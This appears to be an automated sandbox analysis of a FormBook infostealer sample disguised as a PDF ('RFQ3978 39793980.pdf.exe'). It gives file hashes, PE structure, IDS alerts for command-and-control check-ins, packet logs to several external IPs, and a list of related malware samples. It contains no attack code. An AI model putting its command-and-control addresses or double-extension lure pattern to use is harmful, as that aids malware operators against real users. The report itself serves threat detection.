                                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.67.246.81
                                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.95.151.18
                                                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 43.201.56.76
                                                                                                            https://omantel.om.points-mall.me/en/Get hashmaliciousUnknownBrowse
                                                                                                            • 43.156.70.231
                                                                                                            jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 40.16.60.113
                                                                                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 43.139.177.79
                                                                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 40.183.20.22
                                                                                                            CLOUDFLARENETUSSOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.34.183
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.34.183
                                                                                                            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • 162.159.129.233
                                                                                                            ltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                                            • 172.67.216.167
                                                                                                            htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.206.64
                                                                                                            0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.185.252
                                                                                                            https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.21.112.1
                                                                                                            http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.159.113
                                                                                                            https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                                                            • 104.18.20.58
                                                                                                            COGENT-174USloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.195.126.207
                                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 149.16.70.227
                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.253.65.24
                                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 206.149.94.248
                                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.167.77.142
                                                                                                            6400_output.vbsGet hashmaliciousDucktailBrowse
                                                                                                            • 38.255.42.40
                                                                                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 149.103.6.242
                                                                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 149.113.171.18
                                                                                                            AI#U667a#U80fd.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 206.119.80.40
                                                                                                            AI#U667a#U80fd.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 206.119.80.40
                                                                                                            CONTABODEORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 167.86.111.146
                                                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            No context
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Windows\SysWOW64\regini.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.7109338967318575
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:RFQ3978 39793980.pdf.exe
                                                                                                            File size:861'696 bytes
                                                                                                            MD5:3979572152f3fb2b98211eeb761309af
                                                                                                            SHA1:67e622f51e4c1f128ac003e2132b26a87a582a6d
                                                                                                            SHA256:7f3a6082c0ab2b881863c4dfe7328ef497155d2d962fa4a1976a5c26ec1d4e66
                                                                                                            SHA512:8b9db4fa7f51f98372f5fb31960d7fe75d5913c9c941f60df8c02a71642ce324a7120a359641e51205a6a3a791dbbf5f0c59877cde36eb5f1a2fea610aec3c38
                                                                                                            SSDEEP:24576:0jlIhSPd+pz5yOA07B73WHJhiO0ZlzxXvhFNI:0jl+SPspzJA09TDHPvhF
                                                                                                            TLSH:D105D0C03B2A7701DEACB934853AEDB862641E78B00479F37EDD2B57B6D90126A1CF54
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......$........... ... ....@.. ....................................@................................
                                                                                                            Icon Hash:37c38329a3924d33
                                                                                                            Entrypoint:0x4d1fe2
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x675AC199 [Thu Dec 12 10:57:29 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd1f90 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd2000 | 0x21e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xcffe8 | 0xd0000 | a29244549ad0db181660cbb89bcb3904 | False | 0.8906660813551682 | data | 7.712373186885482 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd2000 | 0x21e0 | 0x2200 | 951f1f744f0f03e5e3414146ae638455 | False | 0.9306066176470589 | data | 7.619913047886231 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd6000 | 0xc | 0x200 | 72d48b126301d8ea59e08064101efd3c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd20c8 | 0x1e1f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9939048113085203
RT_GROUP_ICON | 0xd3ef8 | 0x14 | data |  |  | 1.05
RT_VERSION | 0xd3f1c | 0x2c0 | data |  |  | 0.4616477272727273
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T21:48:14.890184+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49793 | 104.21.95.160 | 80 | TCP
2024-12-12T21:48:31.978767+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49829 | 43.199.54.158 | 80 | TCP
2024-12-12T21:48:31.978767+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.4 | 49829 | 43.199.54.158 | 80 | TCP
2024-12-12T21:48:34.636274+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49835 | 43.199.54.158 | 80 | TCP
2024-12-12T21:48:37.313787+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49841 | 43.199.54.158 | 80 | TCP
2024-12-12T21:49:00.394420+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49852 | 43.199.54.158 | 80 | TCP
2024-12-12T21:49:07.463159+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49913 | 154.88.22.105 | 80 | TCP
2024-12-12T21:49:10.119468+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49923 | 154.88.22.105 | 80 | TCP
2024-12-12T21:49:12.801205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49930 | 154.88.22.105 | 80 | TCP
2024-12-12T21:49:15.562392+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49936 | 154.88.22.105 | 80 | TCP
2024-12-12T21:49:22.697579+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49952 | 154.23.184.95 | 80 | TCP
2024-12-12T21:49:25.372601+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49959 | 154.23.184.95 | 80 | TCP
2024-12-12T21:49:28.058440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49967 | 154.23.184.95 | 80 | TCP
2024-12-12T21:49:30.751909+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49973 | 154.23.184.95 | 80 | TCP
2024-12-12T21:49:37.743891+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49990 | 161.97.142.144 | 80 | TCP
2024-12-12T21:49:40.369735+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49997 | 161.97.142.144 | 80 | TCP
2024-12-12T21:49:42.990482+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50004 | 161.97.142.144 | 80 | TCP
2024-12-12T21:49:45.654891+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50012 | 161.97.142.144 | 80 | TCP
2024-12-12T21:49:52.512820+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 66.29.149.46 | 80 | TCP
2024-12-12T21:49:55.206949+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 66.29.149.46 | 80 | TCP
2024-12-12T21:49:57.911741+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 66.29.149.46 | 80 | TCP
2024-12-12T21:50:00.513086+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50028 | 66.29.149.46 | 80 | TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 12, 2024 21:49:07.463159084 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:07.463759899 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.463823080 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.463834047 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:07.463881969 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:07.582973957 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.583081007 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.482222080 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.601959944 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:08.602113962 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.616202116 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.736061096 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.119467974 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:10.154843092 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.155162096 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.155244112 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:10.155417919 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:10.239603043 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.243660927 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.165293932 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.284967899 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.285042048 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.309892893 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.429676056 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429744005 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429856062 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429869890 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429904938 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429965019 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429987907 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.430097103 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.430109024 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:12.800817013 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:12.800920010 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:12.801204920 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:12.822654963 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:13.851336002 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:13.971210957 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:13.971359015 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:14.031729937 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:14.151433945 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:15.561419964 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:15.562258959 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:15.562391996 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:15.565289974 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:15.685069084 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:21.052495003 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:21.172420025 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:21.172529936 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:21.185236931 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:21.305402994 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.697578907 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:22.730657101 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.730720043 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:22.730799913 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.730843067 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:22.817352057 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.817450047 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.717401028 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.837290049 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:23.837388992 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.857618093 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.977701902 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.372601032 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:25.373651028 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.373718977 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:25.373759985 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.373825073 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:25.492461920 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.492580891 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.389389038 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.509351969 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.509620905 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.526307106 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.646215916 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646234035 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646317959 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646336079 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646471977 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646487951 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646655083 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646704912 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646786928 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.058439970 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:28.083762884 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.083842039 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:28.083981037 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.084028006 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:28.178453922 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.178505898 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.077131987 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.196997881 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:29.197133064 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.204853058 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.324613094 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:30.751588106 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:30.751705885 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:30.751909018 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:30.753979921 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:30.873811007 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:36.290565014 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:36.410459042 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:36.410543919 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:36.423399925 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:36.543241978 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743752003 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743796110 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743829966 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743891001 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:37.743916035 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:37.931962013 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:38.950894117 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:39.070913076 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:39.071017981 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:39.090007067 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:39.210129976 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369549990 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369642973 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369735003 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:40.369771957 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369829893 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:40.604077101 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.622080088 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.741934061 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.742027998 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.757076025 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.877100945 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877116919 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877218962 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877243996 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877372980 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877382040 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877511024 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877537966 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877552032 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:42.990283966 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:42.990377903 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:42.990482092 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:43.073491096 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:43.073563099 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:43.260271072 CET5000480192.168.2.4161.97.142.144
